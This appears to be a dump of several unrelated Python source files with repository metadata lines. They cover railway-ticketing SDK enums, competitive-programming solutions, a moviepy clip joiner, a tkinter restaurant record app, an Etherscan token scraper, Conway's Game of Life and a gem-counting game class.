RAILWAY_THERE = 'Railwaythere'
# ЖД сегмент, направление обратно
RAILWAY_BACK = 'Railwayback'
class DocType:
PASSPORT = 'ПН'
BIRTH_CERTIFICATE = 'СР'
RUSSIAN_FOREIGN_PASSPORT = 'ЗП'
FOREIGN_PASSPORT = 'ЗЗ'
PASSPORT_SEAMAN = 'ПМ'
MILITARY_ID = 'ВБ'
USSR_PASSPORT = 'ПС'
MILITARY_OFFICER_CARD = 'УВ'
STATELESS_PERSON_ODENTITY_CARD = 'БГ'
RESIDENCE_PERMIT = 'ВЖ'
RUSSIAN_TEMPORARY_IDENTITY_CARD = 'СУ'
class TimeSw:
# Временной интервал не учитывается
NO_SW = 0
# Временной интервал применяется к моменту отправки поезда
# (параметры Time_from, Time_to в таком случае принимаются целочисленным типом в интервале [0;24])
TRAIN_DISPATCH = 1
# Временной интервал применяется к моменту прибытия поезда
# (параметры Time_from, Time_to в таком случае принимаются целочисленным типом в интервале [0;23])
TRAIN_ARRIVAL = 2
class DirectionGroup:
# Внутригосударственное сообщение, а также международное сообщение
# со странами-участниками СНГ, Литовской, Латвийской, Эстонской, республиками, Республикой Абхазия
INTERNAL = 0
# Международное сообщение в дальнем зарубежье по глобальным ценам. Направление Россия-Финляндия
RUSSIAN_FINLAND = 1
# Международное сообщение в дальнем зарубежье по глобальным ценам. Направление Восток-Запад
EAST_WEST = 2
class Lang:
RU = 'Ru'
EN = 'En'
DE = 'De'
class TrainWithSeat:
# Получение информации о поездах со свободными местами
FREE_PLACE = 1
# Получение информации обо всех поездах
ALL = 0
class GrouppingType:
# Группировка поездов по типу вагона
TYPE = 0
# Группировка поездов по типу вагона и по классу обслуживания
TYPE_AND_SERVICE = 1
# Группировка по типу вагона и по признакам QM/DM
TYPE_AND_QM_DM = 2
# Группировка по типу мест и цене
PLACE_TYPE_AND_PRICE = 3
# Группировка по номеру вагона и цене
CAR_NUMBER_AND_PRICE = 4
# Без группировки
NONE = 5
class JoinTrains:
# Получение списка поездов со склейкой
WITH_BONDING = 0
# Получение списка поездов без склеивания. Используется в случае, если в одном и том же поезде разные вагоны имеют разное время прибытия
WITHOUT_BONDING = 1
class SearchOption:
# Обычный поиск
DEFAULT = 0
# Включить в поиск маршруты в Крымский федеральный округ
CRIMEA = 1
# Включить в поиск мультимодальные перевозки
MULTIMODAL = 2
# Включить в поиск маршруты в Крымский федеральный округ и мультимодальные перевозки
CRIMEA_AND_MULTIMODAL = 3
# Включить в поиск маршруты с пересадкой
TRANSFER = 4
# Включить в поиск маршруты в Крымский федеральный округ и маршруты с пересадкой
CRIMEA_AND_TRANSFER = 5
# Включить в поиск мультимодальные перевозки и маршруты спересадкой
MULTIMODAL_AND_TRANSFER = 6
# Включить в поиск маршруты в Крымский федеральный округ, маршруты с пересадкой и мультимодалные перевозки
ALL = 7
class AllowedDocType:
PASSPORT = 'ПН'
BIRTH_CERTIFICATE = 'СР'
MILITARY_ID = 'ВБ'
PASSPORT_SEAMAN = 'ПМ'
RUSSIAN_FOREIGN_PASSPORT = 'ЗП'
FOREIGN_PASSPORT = 'ЗЗ'
class Services:
EAT = 'EAT'
PAP = 'PAP'
TV = 'TV'
TRAN = 'TRAN'
COND = 'COND'
BED = 'BED'
SAN = 'SAN'
WIFI = 'WIFI'
class LoyaltyCards:
# Начисление баллов "РЖД Бонус"
RZHD_BONUS_SCORING = 'RzhdB'
# Дорожная карта
RZHD_MAP = 'RzhdU'
# Скидка по карте "РЖД Бонус"
RZHD_BONUS_DISCOUNT = 'RzhdSU'
class CarCategories:
# Купейный вагон РИЦ (KV = КУПЕ)
KUPE = 'РИЦ'
# Мягкий вагон РИЦ (KV=МЯГК)
SOFT = 'РИЦ'
# Мягкий вагон Вагон Люкс (KV=МЯГК)
SOFT_LUX = 'ЛЮКС'
# Вагон класса люкс Вагон СВ (KV = ЛЮКС)
LUX = 'СВ'
class AvailableTariffs:
# Полный
FULL = 1
# Детский (до 10 лет)
CHILD_TO_10 = 2
# Детский без места (до 5 лет)
CHILD_WITHOUT_PLACE_TO_5 = 3
# SENIOR (60+) в Сапсан
SENIOR_SAPSAN = 4
# SENIOR (от 60 лет) ГЕНИАЛЬНО
SENIOR = 5
# JUNIOR (от 12 до 26 лет)
JUNIOR = 6
# Детский (до 12 лет)
CHILD_TO_12 = 7
# Детский без места (до 4 лет)
CHILD_WITHOUT_PLACE_TO_4 = 8
# Детский (до 17 лет)
CHILD_TO_17 = 9
# Детский без места (до 6 лет)
CHILD_WITHOUT_PLACE_TO_6 = 10
# Детский (до 7 лет)
CHILD_TO_7 = 11
# Детский без места(до 10 лет)
CHILD_WITHOUT_PLACE_TO_10 = 12
# Детский (от 10 до 17 лет)
CHILD_FROM_10_TO_17 = 13
# Школьник (для учащихся от 10 лет)
SCHOOLBOY_FROM_10 = 14
# Детский без места (для детей до 12 лет)
CHILD_WITHOUT_PLACE_TO_12 = 15
# Детский без места (для детей до 6 лет) ЧТО ? В ЧЁМ ТУТ РАЗНИЦА С ПУНКТОМ ВЫШЕ ? УФСМАТЬВАШУ
CHILD_2_WITHOUT_PLACE_TO_6 = 16
# Молодежный ЮНИОР (для лиц от 10 до 21 года)
JUNIOR_FROM_10_TO_21 = 17
# Праздничный
FESTIVE = 18
# Свадебный
WEDDING = 19
# Семейный
FAMILY = 20
class PlaceTypeNumber:
# Нижний ярус
TOP = 'Н'
# Верхний ярус
BOTTOM = 'В'
# Средний ярус
MIDDLE = 'С'
# (для сидячих вагонов) Для пассажира с животным
ANIMALS = 'Ж'
# (для сидячих вагонов) Для матери и ребенка
MOTHER_CHILD = 'М'
# (для сидячих вагонов) Для пассажира с детьми
CHILDREN = 'Р'
# (для сидячих вагонов) Для инвалидов
INVALID = 'И'
# (для сидячих вагонов) Переговорная
MEETING_ROOM = 'Г'
# (для сидячих вагонов) Не у стола
NOT_TABLE = 'Н'
# (для сидячих вагонов) У стола
TABLE = 'П'
# (для сидячих вагонов) У детской площадки
PLAYGROUND = 'В'
# (для сидячих вагонов) У стола рядом с детской площадкой
TABLE_PLAYGROUND = 'Б'
# (для сидячих вагонов) Рядом с местами для пассажиров с животными
BESIDE_ANIMALS = 'Д'
# (для сидячих) Откидное
FOLDING = 'О'
# (для сидячих вагонов) Отсек (купе) в поезде Ласточка
SITTING_KUPE = '7'
class Confirm:
# Отказ от зарезервированного заказа
REFUSE = 0
# Подтверждение зарезервированного заказа
CONFIRM = 1
# Выбрано трехчасовое резервирование заказа
THREE_HOURS = 2
class ElectronicRegistration:
# Отказ от электронной регистрации
REFUSE = 0
# Согласие на электронную регистрацию
CONFIRM = 1
# Установка ЭР не возможна
IMPOSSIBLE = 3
# Промежуточный статус, устанавливается до отмены ЭР
PRE_REFUSE= 4
# Промежуточный статус, устанавливается до подтверждения заказа.
PRE_CONFIRM = 5
# Статус ЭР не известен
NO_DATA = 6
# Бланк с ЭР распечатан
PRINTED = 7
# Статусы ЭР в бланках одного заказа различаются
DIFFERENT_DATA = 8
# Ошибочный статус ЭР
ERROR_STATUS = 20
class Test:
# Покупка настоящая (после её подтверждения деньги будут списаны)
REAL = 0
# Покупка тестовая, обращения на резервирование мест в АСУ «Экспресс-3» не было
TEST = 1
class PrintFlag:
# Не распечатан
NOT_PRINTED = 0
# Распечатан
PRINTED = 1
class RzhdStatus:
# Без электронной регистрации
WITHOUT_ELECTRONIC_REGISTRATION = 0
# Электронная регистрация
ELECTRONIC_REGISTRATION = 1
# Оплата не подтверждена
FAILED_PAYMENT = 2
# Аннулирован
CANCELED = 3
# Возвращен
RETURNED = 4
# Возвращены места
RETURNED_PLACES= 5
# Выдан посадочный купон (проездной документ) на бланке строгой отчетности
TICKET_ISSUED = 6
# Отложенная отплата (статус возвращается после создания бронирования)
DEFERRED_PAYMENT = 7
class Registration:
REFUSE = 0
CONFIRM = 1
class ReferenceCode:
CO_SERVICES = 'CO_SERVICES'
LOYALTY_CARDS = 'LOYALTY_CARDS'
class InOneKupe:
# Требование не задано
NONE = 0
# В одном купе/в одном ряду (для вагонов с местами для сидения)
IN_ONE_KUPE_OR_ROW = 1
# Не боковые места
NOT_SIDE = 2
# Места в одном отсеке
IN_ONE_COMPARTMENT = 3
class Bedding:
# В стоимость билета не включено постельное белье
NO_LINENS = 0
# В стоимость билета включено постельное белье
LINENS = 1
class FullKupe:
# Выкуп купе целиком
ALL_KUPE = 1
# Выкуп СВ целиком
ALL_SV = 2
class RemoteCheckIn:
# Без электронной регистрации
WITHOUT_ELECTRONIC_REGISTRATION = 0
# Электронная регистрация
ELECTRONIC_REGISTRATION = 1
# Если ЭР возможна, то при подтверждении ЭР устанавливается автоматически
TRY_AUTO_ER = 2
class PayType:
# Оплата наличными
CASH = 'Cash'
# Credit card. Оплата банковской картой. Данный тип оплаты доступен не всем партнерам.
CREDIT_CARD = 'CC'
class Storey:
# Требования к этажу не заданы
NONE = 0
# Первый этаж вагона
FIRST_STOREY = 1
# Второй этаж вагона
SECOND_STOREY = 2
class PlaceDemands:
# Места не у стола
NO_TABLE = 'Н'
# Места у стола (обычные места)
TABLE = 'П'
# Места рядом с детской площадкой и не у стола
PLAYGROUND_NO_TABLE = 'В'
# Места рядом с детской площадкой и у стола
PLAYGROUND_TABLE = 'Б'
# Места рядом с местами для пассажиров с животными
BESIDE_ANIMALS = 'Д'
# Любое место у стола (включая рядом с местами для пассажиров с животными, детской площадкой и т.д)
ANY_TABLE = 'СТОЛ'
# Места не у стола, включая места рядом с детской площадкой и рядом с местами для пассажиров с животными.
# Обобщающее требование. Рекомендуется использовать в случае, если не выбран номер вагона
PLAYGROUND_ANIMALS_NO_TABLE = 'НСТ'
# Места рядом с детской площадкой
PLAYGROUND = 'ДЕТ'
# Места для инвалидов
INVALID = 'И'
# Места для пассажиров с животными
FOR_ANIMALS = 'Ж'
# Отсек (купе)
KUPE = '7'
# Откидное место
HINGED_SEAT = 'О'
# Место матери и ребенка до 1 года
MOTHER_AND_CHILDREN_TO_1 = 'М'
# Места для пассажиров с детьми
MOTHER_AND_CHILDREN = 'Р'
class TicketFormat:
HTML = 'html'
PDF = 'pdf'
class Gender:
MALE = 'мужское'
FEMALE = 'Женское'
MIXED = 'Смешаное'
class AllLanguages:
# Ответ на всех доступных языках;
ALL = 1
# Ответ только на одном конкретном языке, который указан в элементе Lang
AS_LANG = 0
| spacetab-io/ufs-python-sdk | ufs_sdk/wrapper/types.py | types.py | py | 15,381 | python | ru | code | 7 | github-code | 36 |
70806979943 | import sys
board = [[0]*100 for _ in range(100)] # x, y are in 1..100, so a 100x100 grid suffices
answer = 0 # combined area of the 4 rectangles

for _ in range(4):
    x1, y1, x2, y2 = map(int, sys.stdin.readline().split())
    for i in range(x1, x2):
        for j in range(y1, y2):
            board[i-1][j-1] = 1 # mark every cell inside the rectangle

for row in board: # count the marked cells row by row
    answer += row.count(1)

print(answer)
2938441206 | import sys
input = sys.stdin.readline

# Find the largest n whose triangular number T(n) = n*(n+1)/2 does not
# exceed s, i.e. the n with T(n) <= s < T(n+1).
s = int(input())
n = 1
# Integer arithmetic (//) instead of the original float divisions —
# exact for any input size — and a direct loop condition instead of
# while(1) with a dead `continue`.
while (n + 1) * (n + 2) // 2 <= s:
    n += 1
print(n)
| DoSeungJae/Baekjoon | Python/1789.py | 1789.py | py | 187 | python | en | code | 1 | github-code | 36 |
32829769716 | from collections import deque
# BFS 함수 정의
def bfs(sx, sy, ex, ey):
    """Fill the module-level grid `graph` with knight-move distances from (sx, sy).

    Relies on the module-level board size `i` and distance grid `graph`
    (graph cells start at 0 = unvisited). When the start already equals the
    target, graph[ex][ey] is left at 0 and the function returns immediately.
    """
    if (sx, sy) == (ex, ey):
        return
    # The eight (dx, dy) offsets of a knight's move.
    moves = ((-2, 1), (-1, 2), (1, 2), (2, 1), (2, -1), (1, -2), (-1, -2), (-2, -1))
    frontier = deque([(sx, sy)])
    while frontier:
        cx, cy = frontier.popleft()
        for ox, oy in moves:
            nx, ny = cx + ox, cy + oy
            # Skip squares that fall outside the i x i board.
            if not (0 <= nx < i and 0 <= ny < i):
                continue
            # First time reaching this square: record distance and enqueue it.
            if graph[nx][ny] == 0:
                graph[nx][ny] = graph[cx][cy] + 1
                frontier.append((nx, ny))
t = int(input())
# Run each test case independently.
for _ in range(t):
    i = int(input())  # board size; read as a global by bfs()
    sx, sy = map(int, input().split())  # square the knight currently occupies
    ex, ey = map(int, input().split())  # square the knight wants to reach
    graph = [[0] * i for _ in range(i)]  # i x i distance grid (global, filled by bfs)
    # BFS records the minimum number of knight moves to every reachable square.
    bfs(sx, sy, ex, ey)
    # Minimum moves to the target (0 when start == target).
    print(graph[ex][ey])
| veluminous/CodingTest | 백준 실전 문제/[백준 7562 DFS&BFS] 나이트의 이동.py | [백준 7562 DFS&BFS] 나이트의 이동.py | py | 1,306 | python | ko | code | 0 | github-code | 36 |
from moviepy.editor import *
import os
from natsort import natsorted

# Collect all .mp4 clips under the course folder, in natural sort order
# (so "2.mp4" is concatenated before "10.mp4").
clips = []
for root, dirs, files in os.walk("D:\\Sujay\\German\\Best Way to Learn German Language-Full Beginner Course-A1.1\\New folder"):
    for file in natsorted(files):
        if os.path.splitext(file)[1] == '.mp4':
            clips.append(VideoFileClip(os.path.join(root, file)))

# Stitch the clips into a single video file.
final_clip = concatenate_videoclips(clips)
final_clip.to_videofile("output.mp4", fps=24, remove_temp=False)
from tkinter import *
from tkinter import messagebox, Entry
# Cursor into the records of mydata.txt (which line is currently shown).
index=0
# Main application window.
w=Tk()
w.title("Restaurant Management System")
# NOTE(review): `count` is never referenced by any handler below.
count=0
def ok():
    """Debug handler: print a marker and overwrite the first field with 'OK'.

    NOTE(review): not wired to any button in the layout below.
    """
    print("OK")
    s1.set("OK")
def addrec():
    """Append the five form fields as one fixed-width record to mydata.txt.

    Each field is right-padded with spaces to 20 characters (fields already
    20+ characters long are written unpadded, exactly like the original
    character-append loops) and fields are joined by a single space.
    """
    fields = [var.get() for var in (s1, s2, s3, s4, s5)]
    # str.ljust(20) reproduces the original `while len < 20: append " "` loops.
    padded = [field.ljust(20) for field in fields]
    with open("mydata.txt", "a") as f:
        f.write(" ".join(padded) + "\n")
def nextrec():
    """Advance `index` and show that record of mydata.txt in the entry widgets.

    On any failure (no such record, short line) an empty info box is shown,
    matching the original behavior.
    """
    global index
    index = index + 1
    try:
        # Bug fix: the original called file.seek(index) before readlines(),
        # which skipped `index` BYTES and corrupted the first line read.
        with open('mydata.txt', 'r') as file:
            records = file.readlines()
        fields = records[index].split()
        t1.delete(0, 'end'); t2.delete(0, 'end'); t3.delete(0, 'end'); t4.delete(0, 'end'); t5.delete(0, 'end')
        t1.insert(0, fields[0]); t2.insert(0, fields[1]); t3.insert(0, fields[2]); t4.insert(0, fields[3]); t5.insert(0, fields[4])
    except Exception:
        messagebox.showinfo("Title", "")
def prevrec():
    """Step `index` back and show that record; warn when no records remain."""
    global index
    index = index - 1
    try:
        # Guard: a negative index would silently wrap around to the end of
        # the list (the original's file.seek(index) happened to raise here).
        if index < 0:
            raise IndexError
        # Bug fix: the original seeked to byte offset `index` before
        # readlines(), corrupting the first line read.
        with open('mydata.txt', 'r') as file:
            records = file.readlines()
        fields = records[index].split()
        t1.delete(0, 'end'); t2.delete(0, 'end'); t3.delete(0, 'end'); t4.delete(0, 'end'); t5.delete(0, 'end')
        t1.insert(0, fields[0]); t2.insert(0, fields[1]); t3.insert(0, fields[2]); t4.insert(0, fields[3]); t5.insert(0, fields[4])
    except Exception:
        messagebox.showinfo("Title", "no more records")
def firstrec():
    """Load the first record of mydata.txt into the entry widgets."""
    with open('mydata.txt', 'r') as fh:
        # Clear the form, then read the first record.
        for widget in (t1, t2, t3, t4, t5):
            widget.delete(0, 'end')
        fields = fh.readline().split()
        t1.insert(0, fields[0]); t2.insert(0, fields[1]); t3.insert(0, fields[2]); t4.insert(0, fields[3]); t5.insert(0, fields[4])
def updaterec():
    """Rewrite mydata.txt, replacing the record whose first field matches t1."""
    with open('mydata.txt', 'r') as fh:
        lines = fh.readlines()
    with open('mydata.txt', 'w') as fh:
        for line in lines:
            # A record matches when its first whitespace-separated field
            # equals the current contents of the first entry widget.
            if line.split()[0] == t1.get():
                fh.write(t1.get() + '\t' + t2.get() + '\t' + t3.get() + '\t' + t4.get() + '\t' + t5.get() + '\n')
                messagebox.showinfo('Title', 'updated')
            else:
                fh.write(line)
        # Clear the form once the file has been rewritten.
        for widget in (t1, t2, t3, t4, t5):
            widget.delete(0, 'end')
def exitt():
    """Close the main window, ending the Tk event loop and the program."""
    w.destroy()
def deleterec():
    """Delete every record whose first field matches s4, then clear the form."""
    with open("mydata.txt", "r") as f:
        lines = f.readlines()
    with open("mydata.txt", "w") as f:
        for line in lines:
            com = line.split()
            # Keep only records that do NOT match the reference field.
            if com[0] != s4.get():
                f.write(line)
    messagebox.showinfo("Alert", "Record Deleted!")
    # Bug fix: the original called delete() on the StringVars (s1..s5),
    # which have no such method and raised AttributeError; clearing the
    # Entry widgets is the intended behavior.
    for widget in (t5, t4, t3, t2, t1):
        widget.delete(0, "end")
def lastrec():
    """Load the last record of mydata.txt into the entry widgets."""
    with open('mydata.txt', 'r') as fh:
        # Walk the whole file; `k` ends up holding the final line.
        for rec in fh:
            k = rec
    for widget in (t1, t2, t3, t4, t5):
        widget.delete(0, 'end')
    fields = k.split()
    t1.insert(0, fields[0]); t2.insert(0, fields[1]); t3.insert(0, fields[2]); t4.insert(0, fields[3]); t5.insert(0, fields[4])
# ---- Widget construction ---------------------------------------------------
# Creation order (labels, StringVars, entries, buttons) mirrors the original.
captions = ("Food", "Drinks", "Total", "Reference", "Type")
label_widgets = [Label(w, text=caption) for caption in captions]
l1, l2, l3, l4, l5 = label_widgets
variables = [StringVar() for _ in captions]
s1, s2, s3, s4, s5 = variables
entry_widgets = [Entry(w, textvariable=var) for var in variables]
t1, t2, t3, t4, t5 = entry_widgets
actions = (("ADD", addrec), (">", nextrec), ("EXIT", exitt), ("LAST", lastrec),
           ("<", prevrec), ("FIRST", firstrec), ("UPDATE", updaterec), ("DELETE", deleterec))
button_widgets = [Button(w, text=caption, command=handler) for caption, handler in actions]
b1, b2, b3, b4, b5, b6, b7, b8 = button_widgets

# ---- Layout ----------------------------------------------------------------
# One form row per field: label in column 1, entry in column 2.
for row, (label, entry) in enumerate(zip(label_widgets, entry_widgets)):
    label.grid(row=row, column=1)
    entry.grid(row=row, column=2)
# Buttons fill two rows of four (rows 5 and 6, columns 1-4).
for idx, button in enumerate(button_widgets):
    button.grid(row=5 + idx // 4, column=1 + idx % 4)

w.mainloop()
| nitinagg4/RestaurantManagementSystemByNitin | project.py | project.py | py | 4,707 | python | en | code | 0 | github-code | 36 |
import requests
from bs4 import BeautifulSoup
import json

tokens = []
# Scrape pages 1..11 of the Etherscan token listing.
for page in range(1, 12):
    response = requests.get("https://etherscan.io/tokens?p=" + str(page))
    soup = BeautifulSoup(response.content, "html.parser")
    for row in soup.find_all("tr"):
        try:
            cells = row.find_all("td")
            link = cells[1].find("a")['href']
            # Only rows whose link points at a token page carry token data.
            if "token" in link:
                tokens.append({
                    "address": link.replace("/token/", ""),
                    "image": cells[1].find("img")['src'],
                    "name": cells[2].find("a").text,
                })
        except Exception as e:
            # Header/ad rows lack the expected cells; skip them.
            continue

print(json.dumps(tokens))
70719921064 | import numpy as np
from ..patch import Patch
from ..parcel import Parcel
class PropertyDeveloper:
    """Agent that roams the world grid and develops land of one type.

    agent_type is one of 'r' (residential), 'c' (commercial),
    'i' (industrial) or 'p' (park); it selects the weight row of `W` used
    to score candidate patches.
    """

    def __init__(self, world, agent_type, view_radius=5, memory=100):
        self.world = world
        self.view_radius = view_radius
        self.memory = memory  # cap on how many candidate patches are remembered
        self.position = np.random.choice(world.patches.flatten())  # starts in a random patch of the map
        self.dev_sites = []  # TO DO: initialize dev_sites using starting position
        self.dev_patches = []  # remembered candidate patches
        self.considered_patches = []  # patches already evaluated or built on
        self.agent_type = agent_type
        # Bug fix: prospect() reads these counters, but the original never
        # initialized them, raising AttributeError on first use.
        self.last_commit = 0
        self.last_relocate = 0
        # Weights for each type of developer
        ##        eh   ev  epv   dw   dr   di  dpk  dpr   dm    x
        self.W = {
            "r": [.1, .2, 0, .1, .4, 0, 0, .2, 0, 0],
            "c": [ 0, .2, 0, .15, .15, 0, 0, 0, .4, 0],
            "i": [ 0, .5, 0, .3, 0, .1, 0, .1, 0, 0],
            "p": [ 0, 0, .2, .1, .1, 0, .4, 0, 0, .2]
        }

    def getRegion(self, i, j):
        """Return (patches, parcels) visible within view_radius of cell (i, j)."""
        region = self.world.patches[max(1, i-self.view_radius):i+self.view_radius,  # adding padding of 1 patch
                                    max(1, j-self.view_radius):j+self.view_radius].flatten()
        region = [p for p in region if p.developable]  # only developable patches (excludes water, etc)
        region_parcels = []
        region_patches = []
        for patch in region:
            if patch.parcel is None:
                region_patches.append(patch)
            # Excludes parcels of same development type as the agent (TO DO: provisory)
            elif patch.parcel not in region_parcels and patch.parcel.development_type != self.agent_type:
                region_parcels.append(patch.parcel)
        return region_patches, region_parcels

    # Searches for suitable locations in its surroundings
    def prospect(self, dev_sites):
        """Pick the agent's next location from nearby/remembered sites, or globally.

        Returns the updated list of candidate development sites (patches +
        parcels), or [] when no area is left to develop.
        """
        i, j = [self.position.i, self.position.j]
        region_patches, region_parcels = self.getRegion(i, j)
        patch_values, parcel_values = [self.world.patch_values, self.world.parcel_values]
        values = patch_values | parcel_values
        combined_region = region_patches + region_parcels
        if len(dev_sites) != 0 and (self.last_commit > 0 or self.last_relocate > 0):  # move to a seen location
            combined_region = combined_region + dev_sites  # searching in union of region and memory
            region_values = [values[p][self.agent_type] for p in combined_region]
            next_location = combined_region[np.argmax(region_values)]
        else:  # relocate globally
            self.last_relocate = 5  # resets relocation counter
            # Selecting all empty patches from the world
            world_patches = [p for p in self.world.patches.flatten() if p.undeveloped and p.developable]
            world_parcels = [p for p in self.world.parcels if p.development_type != self.agent_type]  # TO DO: check if conversion to agent_type is possible
            world_sites = world_patches + world_parcels
            sorted_idx = np.argsort([values[p][self.agent_type] for p in world_sites])[::-1]
            world_sites = np.array(world_sites)[sorted_idx]
            # Move to a random site in the top 5 best for the agent
            try:
                next_location = np.random.choice(world_sites[:5])
            except ValueError:  # choice on an empty list: no more areas to develop
                return []
        self.dev_patches = []
        self.position = next_location
        #region_patches, region_parcels = self.getRegion() # NOTE: maybe have to be updated after relocation
        # TO DO / NOTE : Check this implementation better later
        dev_parcels = region_parcels
        dev_patches = []
        for patch in self.dev_patches + region_patches:
            if patch not in dev_patches and patch.undeveloped:
                dev_patches.append(patch)
        dev_patches_sorted_idx = np.argsort([values[p][self.agent_type] for p in dev_patches])[::-1]
        dev_patches = np.array(dev_patches)[dev_patches_sorted_idx]
        self.dev_patches = list(dev_patches[:int(0.9*len(dev_patches))])  # keep only the 90% best patches
        dev_sites = list(dev_patches) + dev_parcels
        return dev_sites

    def build(self, site):
        """Try to develop `site`; return True on success and False otherwise."""
        if isinstance(site, Patch):  # building on a patch is direct
            self.considered_patches.append(site)
            new_parcel = self.world.createParcel(site, development_type=self.agent_type)  # TO DO: expand to create parcels of multiple patches
            if new_parcel is None:
                return False
            for patch in new_parcel.patches:
                # Prevent roads from being built on top of this patch
                self.world.addBlockedPatch(patch)
            return True
        return False

    def getScore(self, patch):
        """Score `patch` for every development type.

        Returns a dict keyed both by plain type ('r', 'c', 'i', 'p') — which
        is how prospectNew/buildNew look scores up via agent_type — and by
        the original 'Vr'-style names for backward compatibility.  (The
        original returned only the 'V*' keys, so getScore(...)[agent_type]
        raised KeyError.)
        """
        i, j = [patch.i, patch.j]
        region_patches, region_parcels = self.getRegion(i, j)
        eh = patch.get_eh(self.world.patches)
        ev, epv = patch.get_ev(self.world.patches)
        dpr = patch.get_dpr()
        dw = patch.get_dw()
        dr = patch.get_dr(region_patches, region_parcels)
        dc = patch.get_dc(region_patches, region_parcels)  # NOTE(review): computed but unused in A — confirm whether it belongs in the feature vector
        di = patch.get_di(region_patches, region_parcels)
        dm = patch.get_dm(self.world.parcels)
        dpk = patch.get_dm(self.world.parcels)  # NOTE(review): duplicates dm — presumably should call a park-distance getter; confirm against Patch API
        A = [eh, ev, epv, dw, dr, di, dpk, dpr, dm, 0]
        # Bug fix: the original used self.W['i'] twice, so the commercial
        # score Vc was computed with the industrial weight row.
        W = [self.W['r'], self.W['c'], self.W['i'], self.W['p']]
        Vr, Vc, Vi, _ = np.dot(W, A)
        Vp = (1/Vr + 1/Vc + 1/Vi) * self.W['p'][-1]  # anti-worth: parks prefer low-value land
        return {'Vr': Vr, 'Vc': Vc, 'Vi': Vi, 'Vp': Vp,
                'r': Vr, 'c': Vc, 'i': Vi, 'p': Vp}

    def prospectNew(self):
        """Score reachable candidate patches; build on or relocate to the best one.

        Returns the list of accessible, not-yet-considered candidate patches.
        """
        i, j = [self.position.i, self.position.j]
        region_patches, region_parcels = self.getRegion(i, j)
        available_patches = self.dev_patches + region_patches  # memory + newly seen
        available_patches = [p for p in available_patches if p not in self.considered_patches and self.world.isAccessible(p)]
        # No candidates in sight: relocate globally until some become visible.
        while len(available_patches) == 0:
            self.position = np.random.choice(self.world.patches.flatten())
            i, j = [self.position.i, self.position.j]
            region_patches, region_parcels = self.getRegion(i, j)
            available_patches = [p for p in region_patches if p not in self.considered_patches and self.world.isAccessible(p)]
        scores = [self.getScore(patch)[self.agent_type] for patch in available_patches]
        best_patch = available_patches[np.argmax(scores)]
        if self.position == best_patch:
            self.build(self.position)
            print("Building")
        else:
            self.position = best_patch
            print("Relocating")
        return available_patches

    def buildNew(self):
        """Build on the globally best-scoring accessible, undeveloped patch."""
        available_patches = [p for p in self.world.patches.flatten() if p.developable and p.undeveloped and p not in self.considered_patches]
        # Score every patch and sort best-first.
        scores = [self.getScore(p)[self.agent_type] for p in available_patches]
        sorted_idx = np.argsort(scores)[::-1]
        sorted_patches = np.array(available_patches)[sorted_idx]
        # Try the patches in score order; build() fails on inaccessible ones.
        for patch in sorted_patches:
            if self.build(patch):
                break

    def interact(self):
        """One simulation step: prospect, then trim the candidate memory."""
        self.dev_patches = self.prospectNew()
        self.dev_patches = self.dev_patches[:min(len(self.dev_patches), self.memory)]
        # Drop patches that have become undevelopable since being remembered.
        self.dev_patches = [p for p in self.dev_patches if p.developable]
40053694782 | import time
import random
def main():
    """Run Conway's Game of Life on a 50x20 grid in the terminal.

    Seeds the board with up to 700 random live cells (duplicate drops
    allowed), then animates 220 generations at two frames per second using
    ANSI escape codes.
    """
    rows = 20
    cols = 50
    size = rows * cols          # renamed from `max`, which shadowed the builtin
    generations = 220
    drops = 700
    cur = [0] * size            # current generation
    nxt = [0] * size            # next generation (border cells stay 0)
    print("\033[2J")            # ANSI: clear screen
    # Drop cells at random locations.
    for _ in range(drops):
        cur[random.randint(0, size - 1)] = 1
    countdown = generations
    while countdown > 0:
        countdown -= 1
        # Interior cells only (skips the first and last row, as in the
        # original port); neighbor offsets assume a 50-wide row layout.
        for i in range(51, 949):
            neighbors = (cur[i-1] + cur[i+1] + cur[i-51] + cur[i-50] + cur[i-49]
                         + cur[i+49] + cur[i+50] + cur[i+51])
            nxt[i] = cur[i]
            if cur[i] == 0 and neighbors == 3:
                nxt[i] = 1      # birth
            elif cur[i] == 1 and (neighbors < 2 or neighbors > 3):
                nxt[i] = 0      # death by under- or over-population
        # Display results.
        print("\033[1;1H")      # ANSI: home cursor
        print(countdown)        # countdown
        for i in range(0, size):  # 50x20 grid
            if nxt[i] > 0:
                print("O", end='')
            else:
                print(".", end='')
            if (i + 1) % 50 == 0:
                print('')       # new line at the end of each row
            # Copy the new state back into the main array.
            cur[i] = nxt[i]
        time.sleep(0.5)


# Guard the entry point so importing this module does not start the animation.
if __name__ == "__main__":
    main()
| mscottreynolds/cse210-06 | test/awk.py | awk.py | py | 1,328 | python | en | code | 0 | github-code | 36 |
22078953220 | from enum import Enum
import random
import copy
random.seed(None)
def setSeed(s):
    """Seed the module-wide RNG so shuffles and draws are reproducible."""
    random.seed(s)
"""
Basic enumerated class to specify colors when needed.
"""
class Color(Enum):
    """Gem colors; GOLD is the wildcard (joker) token."""
    WHITE = 0
    BLACK = 1
    GREEN = 2
    RED = 3
    BLUE = 4
    GOLD = 5

    @classmethod
    def mapToColor(self, color):
        """Map a one-letter code to a Color member, or None for unknown codes."""
        if (color == "W"):
            return Color.WHITE
        elif (color == "K"):
            return Color.BLACK
        elif (color == "E"):
            return Color.GREEN
        elif (color == "R"):
            return Color.RED
        elif (color == "B"):
            return Color.BLUE
        elif (color == "G"):
            return Color.GOLD
        else:
            return None

    def __str__(self):
        """Return this color's one-letter code (the inverse of mapToColor).

        Bug fix: the original compared self.value against 1..6, but members
        are valued 0..5, so every code was shifted by one color and
        str(Color.WHITE) produced the empty string.
        """
        codes = {
            Color.WHITE: "W",
            Color.BLACK: "K",
            Color.GREEN: "E",
            Color.RED: "R",
            Color.BLUE: "B",
            Color.GOLD: "G",
        }
        return codes[self]
"""
Basic enumerated class to specify whether a player is a human or AI.
"""
class PlayerType(Enum):
HUMAN = 1
AI = 2
"""
A GemDict is a dictionary with Color keys and int values. Dictionary can be accessed through the getter.
"""
class GemDict:
    """A per-Color gem count (the five regular colors; GOLD is tracked separately)."""

    def __init__(self, gem_lst):
        """gem_lst: counts in the order [white, black, green, red, blue]."""
        self.data = {
            Color.WHITE : gem_lst[0],
            Color.BLACK : gem_lst[1],
            Color.GREEN : gem_lst[2],
            Color.RED : gem_lst[3],
            Color.BLUE : gem_lst[4]}

    def add(self, color, num):
        """Add num gems of `color`; raise ValueError for untracked colors (e.g. GOLD)."""
        if color not in self.data:
            raise ValueError
        self.data[color] += num

    def remove(self, color, num):
